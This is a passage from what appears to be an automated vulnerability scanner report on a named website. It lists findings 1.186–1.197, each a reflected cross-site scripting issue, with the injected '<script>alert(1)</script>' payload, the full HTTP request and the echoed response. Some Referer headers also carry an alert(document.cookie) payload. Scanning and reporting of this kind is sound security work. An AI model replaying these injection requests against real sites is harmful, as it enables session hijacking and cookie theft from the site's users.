<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2?a97b2\"><script>alert(1)</script>481e6eac7c6=1" type="hidden" />
...[SNIP]...

1.186. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee8e"><script>alert(1)</script>7e220eebda7 was submitted in the REST URL parameter 1. This input was echoed as 7ee8e\"><script>alert(1)</script>7e220eebda7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7ee8e"><script>alert(1)</script>7e220eebda7/plugins/wp-followme/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content7ee8e\"><script>alert(1)</script>7e220eebda7/plugins/wp-followme/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.187. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa90"><script>alert(1)</script>4eaf9ab9417 was submitted in the REST URL parameter 2. This input was echoed as bfa90\"><script>alert(1)</script>4eaf9ab9417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbfa90"><script>alert(1)</script>4eaf9ab9417/wp-followme/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsbfa90\"><script>alert(1)</script>4eaf9ab9417/wp-followme/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.188. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64678"><script>alert(1)</script>1b810eecd7d was submitted in the REST URL parameter 3. This input was echoed as 64678\"><script>alert(1)</script>1b810eecd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme64678"><script>alert(1)</script>1b810eecd7d/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme64678\"><script>alert(1)</script>1b810eecd7d/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.189. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b8a"><script>alert(1)</script>bf9f4fc53b was submitted in the REST URL parameter 4. This input was echoed as f3b8a\"><script>alert(1)</script>bf9f4fc53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flashf3b8a"><script>alert(1)</script>bf9f4fc53b/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:21:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flashf3b8a\"><script>alert(1)</script>bf9f4fc53b/wp_followme.swf" type="hidden" />
...[SNIP]...

1.190. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ce5"><script>alert(1)</script>28fd4a0ed78 was submitted in the REST URL parameter 5. This input was echoed as c2ce5\"><script>alert(1)</script>28fd4a0ed78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flash/wp_followme.swfc2ce5"><script>alert(1)</script>28fd4a0ed78 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:21:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swfc2ce5\"><script>alert(1)</script>28fd4a0ed78" type="hidden" />
...[SNIP]...

1.191. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87f3"><script>alert(1)</script>10e5d12dd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a87f3\"><script>alert(1)</script>10e5d12dd72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flash/wp_followme.swf?a87f3"><script>alert(1)</script>10e5d12dd72=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf?a87f3\"><script>alert(1)</script>10e5d12dd72=1" type="hidden" />
...[SNIP]...

1.192. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e07"><script>alert(1)</script>560c779c807 was submitted in the REST URL parameter 1. This input was echoed as f8e07\"><script>alert(1)</script>560c779c807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf8e07"><script>alert(1)</script>560c779c807/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf8e07\"><script>alert(1)</script>560c779c807/themes/rt_mynxx_wp/css/light.css" type="hidden" />
...[SNIP]...

1.193. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38594"><script>alert(1)</script>1d9606001d8 was submitted in the REST URL parameter 2. This input was echoed as 38594\"><script>alert(1)</script>1d9606001d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes38594"><script>alert(1)</script>1d9606001d8/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes38594\"><script>alert(1)</script>1d9606001d8/rt_mynxx_wp/css/light.css" type="hidden" />
...[SNIP]...

1.194. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f395"><script>alert(1)</script>7a4b1d2f5e3 was submitted in the REST URL parameter 3. This input was echoed as 6f395\"><script>alert(1)</script>7a4b1d2f5e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp6f395"><script>alert(1)</script>7a4b1d2f5e3/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp6f395\"><script>alert(1)</script>7a4b1d2f5e3/css/light.css" type="hidden" />
...[SNIP]...

1.195. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f787"><script>alert(1)</script>d9c7a8e343b was submitted in the REST URL parameter 4. This input was echoed as 9f787\"><script>alert(1)</script>d9c7a8e343b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css9f787"><script>alert(1)</script>d9c7a8e343b/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css9f787\"><script>alert(1)</script>d9c7a8e343b/light.css" type="hidden" />
...[SNIP]...

1.196. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c386"><script>alert(1)</script>a3110606fc was submitted in the REST URL parameter 5. This input was echoed as 2c386\"><script>alert(1)</script>a3110606fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css2c386"><script>alert(1)</script>a3110606fc HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css2c386\"><script>alert(1)</script>a3110606fc" type="hidden" />
...[SNIP]...

1.197. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eac4c"><script>alert(1)</script>ba25096ea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eac4c\"><script>alert(1)</script>ba25096ea8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css?eac4c"><script>alert(1)</script>ba25096ea8d=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
